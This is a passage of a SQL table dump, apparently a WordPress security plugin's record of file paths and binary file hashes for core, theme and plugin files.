'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V��=y��','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X` Y��鈨','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pq�����EyJ�$��','�Y�Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��u�\n�xv6�','��Vk�\n&B����S2�w@��UG�ƺ����?�','',0,'?'),('hn�\r\"%���Є,��$','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nD+a%�� O��T��F','�ѧV]��-x���>��ɇ��IOy}/�','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h~�`���>n�d�H�;','wp-content/themes/doctors/core/customizer/help/_border_color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�2�������}i���','��\nvke��\0k\'����[����s�xH�0�+8','',0,'?'),('h����h����-kK=�\n','wp-content/themes/skt-toothy/inc/about-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�kg]˿��ڢ�i�','�*���|��G�솷�+�� �W�-�Ɏ�ƽ\Z','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r 1�C\'�m��h$x(���','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� &�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�.α�D4$�Gv��lC','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���sw~�O���','���I�D��v���j�Q߶��d;��t�\Z��¦','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק� ��ߋ�ޙ���J�6�qm','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('h��2b]�ߘ�go��I','wp-content/themes/healthcare/bootstrap/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�D�u�Z>�}*]ٮ�',' ���(G��0�Z���qQw���`����·','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i6��m�K챽9r�','wp-content/themes/weblog/acmethemes/customizer/design-options/blog-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȼ>l������Fi�','��·pr��H��\0��sxj�2Qg{acGZ���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i& P�ׄ��\Z��/9','wp-content/themes/weblog/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8^����ow����','Ɔ�j1�X�7�K�IS~��F�!P�}]� ','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('i<3�\"��� sm\0�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-color-scheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��R�z�ߜ��','�@i��\"��-�)��S\n��[�B�_:�|F\0�3','',0,'?'),('i@��s�ԏ������','wp-content/themes/healing-touch/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���er�Z@�ͭ�','ry�H�v��F�u� |�.H��C�_ppOD\\','',0,'?'),('iB�Z�1KH�4Q.W�','wp-content/themes/doctors/template-rightSidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��/i�l��gXzC�','.Q������ꯅ�N����q|��}�8�t�','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�S�e�ۋ-/','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<���s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('i��v��9\"���.','wp-content/themes/doctors/core/home/blocks/testimonial/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�2O=_��DRΊ�','s��3�\"�����C�L�L!�>����:�dˑ_','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�H�a})Β��;��~s','�3�&d)��s\Z<7æa�v�y�7�v�~����','',0,'?'),('i�����(r>����','wp-content/themes/regina-lite/inc/customizer/panels/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͐�ɗ\Z�A�:J��','��z����h���(9�LorYM\r�8E�E','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o���� �cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j/!�*�Ƈ��`���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dimension.php',0,'��l���������`2�','��l���������`2�','s��ȋx��ǫ�pL�>��E �*j�9��*fE','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('jI�M�ǒf>t�1�t��','wp-content/themes/regina-lite/layout/js/plugins/navigation/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]���^6x��]�-','\'�9�rzC�~�dCh�Pyk}:�Q�7:���k','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jb�88���p/WD��L','wp-content/themes/healing-touch/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yG����٨;�T{@','�gg�`�(�}m�ڂO�Ov�jRm?�KT�','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f�+�#k�','����z\Z��O��3����}*�i�u`�!','',0,'?'),('jo�T\\T�f�r��R�','wp-content/themes/doctors/core/assets/images/swipebox/icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ho��J�+^HFg�','JA\r5�Z�sb�EA!t���A��l��Lڤ\'�+�','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�.d��\rZ�D�6','���f���ɝq?��pRv�u�Ȣ�','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� R��rP��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j�a$� ?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j麡ř��Nޫuwc��','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-text.php',0,'����+PLh��h��_�','����+PLh��h��_�','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),('j��wc�����6�4�','wp-content/themes/doctors/core/assets/js/jquery.swipebox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��y��P',']�����D8X2�\\V��W���)l�V/\"^,n','',0,'?'),('k�V:o��\0�\n��a�Q','wp-content/plugins/disable-gutenberg/languages/disable-gutenberg.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�Q(��B �հA','{,ϰzې�2l}�s�;Z�C�nc��q|�Q;y','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H� �u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('kIxL�>�7�>� ��','wp-content/themes/regina-lite/layout/css/owl-carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����DF�H�<�P<E�','��p�?��I�Ü$�d�Б>d���Ί1�','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����D�G��','����+��*ە�ۦE�J�%\"���HID�-�','',0,'?'),('kN��Zd˃G4Q�-{','wp-content/themes/regina-lite/inc/customizer/panels/hero.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6!�wOF7K�CL�vL','1�C�]^P�,5\n�`k�S�-t%����>y�vA','',0,'?'),('kl�O�����S5p��','wp-content/themes/healthcare/css/font-awesome/scss/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ra�z���R�F�lY','�M�kj��ݺI�JIDO@��T��sO_d�7','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k}ͮp��-r���z��','wp-content/themes/doctors/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d[��t��0�>M\\�','9�9�ó\\��)��kkB��� �%٫��q-','',0,'?'),('k��#��7B+���G','wp-content/themes/weblog/acmethemes/customizer/options/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u�� y���R��y�','4X!��,SC��(m�}�����4�QɄ+','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��7�d\\��P�8�fJ','wp-content/themes/wp-barrister/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����1�0&.9��u','��O;�ju�}Ym���R�,�*�Qg�`%��ds ','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('k��(���� �G��o','wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php',0,'Qg�8��b�w�iD��','Qg�8��b�w�iD��','M�E����IF�BK���0GWS�o2S\'��\"�¢I','',0,'?'),('k��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ�� #푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z���%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('k�=T�g�q�6k��\Z','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php',0,'x��t�\\�����%s[d','x��t�\\�����%s[d','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�nu���G-t�\n�1�','��q��3#������Sr�c:w�L�','',0,'?'),('l������:���a�D','wp-content/themes/doctors/core/home/home-customizer-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3���ȑ��o\\�,�','�wx�lId�*��0A�E�Yض�T�r^2 w,','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s� ��O>���{��ĩ�2�!�.�1��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lH_�!�#�\"�|�g�0','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select.php',0,'�uθ��\"��','�uθ��\"��','N�\r��v���r����\r7C�H��G+���','',0,'?'),('lP��Ŝ<O���u�','wp-content/plugins/disable-gutenberg/css/settings.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�I���e;r��[�','F���+�Bߟ���YR��a�K�tg�m�0bR','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('lc��ؚ\"�R��+�','wp-content/themes/regina-lite/inc/customizer/assets/js/customizer_panel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k��p�=v��','M����\'\n���М����R\n�n�\Z�?��','',0,'?'),('l���lý���A1�L,k','wp-content/themes/healing-touch/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�����v�F����','f���ȍ��$\0:N�)�d/ay�x��E^','',0,'?'),('l��b�Ɍ�r^z�#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xݮ�<�N\0.�ܰ��x','#C����?�=�Z�\\N-ev�\Z��w�GU!J��\Z','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('m5�d\nGћ��!�;㢐','wp-content/themes/regina-lite/layout/js/plugins/customizer/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�z&e�հ�����','.<���\n��qUIn&kv�[�}��v\"�Q��','',0,'?'),('mA�p�� 1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('med��|��_�N�\ZO[','wp-content/themes/healthcare/images/personal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���wX���Ef','��c�Ώ{�|[La�Vf�5�gƂ���d�x���','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[=�px ��LE�^�4|��~30yx\Z�&�','',0,'?'),('m��.#͕�\' w�b�','wp-content/themes/doctors/core/contents/loop_category/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���t�\0��EG��n`','0��&!�z�ҥ���+�� ��G�z6�kƌ','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=���\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=� ���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[ X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ }�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n$���/(D�u�J�k','wp-content/plugins/redirection/actions/pass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;\0��s����$�-','.��.W�P�]�H\r4���L���\\��ٝ6� ','',0,'?'),('n-}��M4\nZm','wp-content/themes/weblog/acmethemes/customizer/footer-section/footer-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��\'Z�d�tڶ�','��).!tV&]7Yî�ϐ�Q�^W}�=�#j','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T ��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nFڰ�Od\0�|�F�e','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/customizer-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��<7{$< �u`�','�3}�\0��+�GF*��wA��DϚ-!dM�Б\"�','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�m�2\Z�.P���','�pA�V��O����i2E�ck�F]Y$SQ�Sl','',0,'?'),('n�\r\ro��y�px�@��','wp-content/themes/doctors/core/home/blocks/info_box/skin1/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�-�ᐽ0�����','���Jz�7V��F��X�>�w/:����P�_�','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('n�e�����;����<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���Yp;:���N�','uL;�ީݒ<�sby\r7J�V����5[*ZzK��','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n��o�����y���','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����_�\n\Zt','>��M�,��A���a���k��\0�m,�D��','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn����/���=�','�v�Q�m����� 